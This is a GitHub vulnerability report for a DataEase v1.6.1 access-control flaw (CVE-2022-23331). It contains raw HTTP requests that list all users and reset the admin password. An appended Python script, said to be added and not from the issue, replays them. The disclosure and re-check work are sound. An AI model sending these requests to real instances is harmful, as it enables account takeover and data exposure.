Headline
CVE-2022-23331: Security Issues[Bug] · Issue #1618 · dataease/dataease
In DataEase v1.6.1, an authenticated user can gain unauthorized access to all user information and can change the administrator password.
DataEase version
v1.6.1
Browser version
Chrome 96.0.4664.110
Bug description
I found a Broken Access Control vulnerability.
An authenticated user can access information about all users and change the admin password.
Bug reproduction steps (screenshots are better)
- use the demo login
- this API gives access to information about all users:
```http
POST /api/user/userGrid/1/10 HTTP/1.1
Host: dataease.fit2cloud.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
LINK-PWD-TOKEN: null
Connection: close
Referer: https://dataease.fit2cloud.com/
Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
Content-Length: 13
{"orders":[]}
```
- this API changes the admin password:
```http
POST /api/user/adminUpdatePwd HTTP/1.1
Host: dataease.fit2cloud.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
LINK-PWD-TOKEN: null
Connection: close
Referer: https://dataease.fit2cloud.com/
Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
Content-Length: 36
{"userId":1,"newPassword":"SECtest"}
```
now you can log in with admin/SECtest
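The following script is an added example for re-checking this report against a DataEase instance you own; it is not code from the issue or from the DataEase project. It decodes (without verifying) the JWT from the report to show that the token names the non-admin `demo` user (userId 2), rebuilds the two requests exactly as posted, and sends them with a low-privilege token you supply. The password-change request is only sent when `--change-password` is passed, because it really resets the admin password. The response-body format is an assumption: only the HTTP status is interpreted, and the body is printed raw so you can see a denial that a 200 envelope might carry.

```python
"""Re-check for the DataEase v1.6.1 broken access control report (CVE-2022-23331).

Added example, not code from the issue or the DataEase project.
Assumptions: a 401/403 status means the server rejected the caller; DataEase
may also signal denial inside a 200 body, so the body is printed as well.
"""
import base64
import json
import sys
import urllib.error
import urllib.request

# Token copied from the report (demo user, userId 2, expired long ago). It is
# only decoded here to show whose identity the server was trusting.
DEMO_TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
              "eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0."
              "m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg")


def decode_jwt_payload(token: str) -> dict:
    """Decode the JWT payload WITHOUT verifying the signature.

    Enough to read which user the token names. The server must verify the
    signature and then still enforce authorization on the named user.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS token")
    payload = parts[1] + "=" * (-len(parts[1]) % 4)  # restore base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))


def build_requests(base_url: str, token: str, target_user_id: int = 1,
                   new_password: str = "SECtest") -> list:
    """Return the two requests from the report as (name, method, url, headers, body)."""
    base = base_url.rstrip("/")
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Content-Type": "application/json",
        "Authorization": token,
        "Cookie": "Authorization=" + token,  # the report sent the token in both places
    }
    return [
        ("user listing (userGrid)", "POST", base + "/api/user/userGrid/1/10",
         headers, json.dumps({"orders": []})),
        ("admin password change (adminUpdatePwd)", "POST", base + "/api/user/adminUpdatePwd",
         headers, json.dumps({"userId": target_user_id, "newPassword": new_password})),
    ]


def send(method: str, url: str, headers: dict, body: str, timeout: int = 10):
    """Send one request and return (status, body_text); HTTP errors are returned, not raised."""
    req = urllib.request.Request(url, data=body.encode(), headers=headers, method=method)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def verdict(status: int) -> str:
    """Interpret the status only (assumption: see module docstring)."""
    if status in (401, 403):
        return "rejected"
    if 200 <= status < 300:
        return "accepted"  # a non-admin token reached the endpoint
    return "inconclusive"


if __name__ == "__main__":
    if len(sys.argv) < 3:
        sys.exit("usage: recheck.py <base_url> <low-privilege-jwt> [--change-password]")
    base_url, token = sys.argv[1], sys.argv[2]
    print("token claims:", decode_jwt_payload(token))  # expect a non-admin userId
    requests_to_send = build_requests(base_url, token)
    if "--change-password" not in sys.argv:
        requests_to_send = requests_to_send[:1]  # the second request resets the admin password
    for name, method, url, headers, body in requests_to_send:
        status, text = send(method, url, headers, body)
        print(f"{name}: HTTP {status} -> {verdict(status)}; body: {text[:200]!r}")
```

On a patched instance the listing request should come back `rejected` for a token whose claims show a non-admin user; if it comes back `accepted`, read the printed body before concluding, since an application-level denial may still arrive with HTTP 200.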